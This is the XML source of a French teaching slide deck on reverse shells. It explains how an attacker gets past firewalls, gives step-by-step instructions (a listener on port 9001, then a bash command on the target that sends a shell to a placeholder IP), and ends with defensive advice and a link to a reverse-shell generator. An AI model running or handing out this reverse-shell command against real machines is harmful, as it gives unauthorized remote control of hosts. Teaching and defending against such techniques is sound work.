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3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4B002-5894-70A9-4056-1E845A1C3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4BCFA-2ACB-6C10-61FF-C6471698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3BC6E-0F2B-73D5-E06C-768EF2F2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BCE-E0DF-49F4-A6B5-AEA899842E2A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83632-7F81-B0A3-AEDC-B7DDB1E8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0C6F4-7A02-2A57-8C0E-14AFA93F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AB26-7971-4AD3-8526-49E79B2DD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8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3E30E-F814-B4BF-8A5A-BC91460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rianne" panose="02000000000000000000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5C0C8-D2E2-9550-4703-283915FA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rianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:latin typeface="Marianne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D7AF35-4D54-5ACB-582B-DE52C7C4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arianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{19743BCE-E0DF-49F4-A6B5-AEA899842E2A}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/03/2024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5F83B-E7B7-291D-7173-2F780E5F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arianne" panose="02000000000000000000" pitchFamily="2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75EF8A-36E2-2760-996B-072D7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rianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0E7EAB26-7971-4AD3-8526-49E79B2DDC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6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8E2431-1ACE-9BC7-25DE-E641B35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13838-E198-236D-FC15-58450B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0756C-2265-A7D0-8357-E4C82680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ianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{19743BCE-E0DF-49F4-A6B5-AEA899842E2A}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/03/2024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197B-76C5-6311-1A60-D2049A11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ianne" panose="02000000000000000000" pitchFamily="2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03E12-2F0A-204D-CE8F-34543808D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ianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0E7EAB26-7971-4AD3-8526-49E79B2DDC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0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rian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iann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8AE90-6D06-3AC1-EF2C-807C3EF4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42815-7503-DF69-C196-DB805813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4BC1C4-C958-A88A-29B9-6B6788C0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44" y="1400068"/>
            <a:ext cx="6829371" cy="5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09EB2-B092-0018-1AF5-B69E370E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057F1-8796-8C39-DECA-D4874638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une maintenance à distance de machines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Mais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> …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 aussi de pénétrer des hôtes facilement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>D’outrepasser certains mécanismes de protection (comme les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pare-feux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Et enfin d’utiliser certaines vulnérabilités …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15859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36FF-6D75-4172-3CB3-37DA8B01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C8866-5308-EED5-A97B-F15E563F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Se protéger :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dirty="0"/>
              <a:t>Minimiser les connexions vers l’extérieur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Supprimer les interpréteurs non nécessaires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Prévenir les « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> » (mise à jour de votre OS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222911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8C351-F10A-227A-11F8-BD07833C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29D97-F8FD-52A7-2244-CF4D462D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Configuration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Votre machine exposée sur internet (@ip : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) avec le port 9001 ouvert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 la machine cible (non exposée directement sur internet) qui va donner accès à « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>l’attaquant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22578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8C351-F10A-227A-11F8-BD07833C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29D97-F8FD-52A7-2244-CF4D462D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Etape 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>– activer l’écoute depuis votre machine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301735-6E4C-AA45-E772-B69B22AE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73" y="2917082"/>
            <a:ext cx="7191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9B40-1619-7DC7-F244-712E62A9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F60FD-E334-0466-A51F-F79E2D36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Etape 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>- Sur la machine cible, lancer une requête (peut se faire depuis un script, un programme python, …)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3E47BF-90D1-ABE5-986C-F2B8937E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97" y="3073737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6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E2D78-A676-861B-7461-47E78AD8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9381F-8BE4-15AA-7552-72E1DF32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Explication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-i &amp;&gt; /dev/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xxx.xxx.xxx.xxx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/9001 0&gt;&amp;1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EA77D-5CBC-65B7-22EA-E3CD4D418DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819072" y="5292546"/>
            <a:ext cx="322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arianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Redirige les sorties (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) vers l’adresse IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> sur le port 9001 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779DE6-6528-5023-01CD-1A33C590D331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3433863" y="3429000"/>
            <a:ext cx="671209" cy="186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ABAB9E8-9176-59B0-FC8E-78240BFA0AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198469" y="5134590"/>
            <a:ext cx="3229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arianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Le descripteur 0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) est dupliqué vers le descripteur 1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Marianne" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) 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D715CA-8A3E-19EF-FC08-83E76269C4C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8813260" y="3241154"/>
            <a:ext cx="1079767" cy="173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06F1404-3868-9D96-E3B0-5BD08ED41E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202655" y="4310852"/>
            <a:ext cx="2256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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est interactif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8933CB7-7666-AE8B-3ADC-C85661DFEEA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1331064" y="3361532"/>
            <a:ext cx="692287" cy="9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076C5-916E-878C-1AFD-3062A41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C768B-479C-B6D6-7746-4BB16BA7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Etape 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Enjoy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>! (la machine cible est accessible et vous avez les droits du propriétaire)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E80B2D-CA06-6A22-0145-18CC02C7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6" y="3406775"/>
            <a:ext cx="7191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E9D9F-EE33-9941-2198-8565EF7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600B-95A6-8B82-4EE6-E5D17AC4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Liens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Reverse Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>Generator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: https://www.revshells.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4149122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243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Marianne</vt:lpstr>
      <vt:lpstr>Thème Office</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse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Shell</dc:title>
  <dc:creator>Philippe Truillet</dc:creator>
  <cp:lastModifiedBy>Philippe Truillet</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-14T08:53:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-14T10:01:02Z</dcterms:modified>
</cp:coreProperties>
</file>